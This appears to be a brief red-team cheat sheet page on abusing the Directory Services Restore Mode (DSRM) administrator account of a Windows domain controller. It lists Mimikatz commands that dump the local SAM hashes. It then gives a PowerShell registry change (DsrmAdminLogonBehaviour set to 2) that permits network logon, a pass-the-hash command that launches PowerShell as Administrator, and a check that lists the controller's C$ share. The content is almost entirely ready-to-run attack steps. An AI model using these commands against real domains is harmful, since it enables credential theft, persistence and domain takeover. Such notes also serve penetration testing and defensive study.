DSRM
Abuse
token::elevate
lsadump::sam # As DSRM password is a local account, we dump the local SAM database.# DSRM Administrator, by default, cannot login from the system, and can only login from the physical console or the virtual console.
# Registry edits are required to enable logon over network.
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD
# Can be verified with
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa"
# Now the hash of this Account can be used to perform pass the hash and get command exection on the DC
sekurlsa::pth /domain:<dc-hostname> /user:Administrator /ntlm:<hash> /run:powershell.exe
# verificaiton
ls \\<dc-machine>\C$Last updated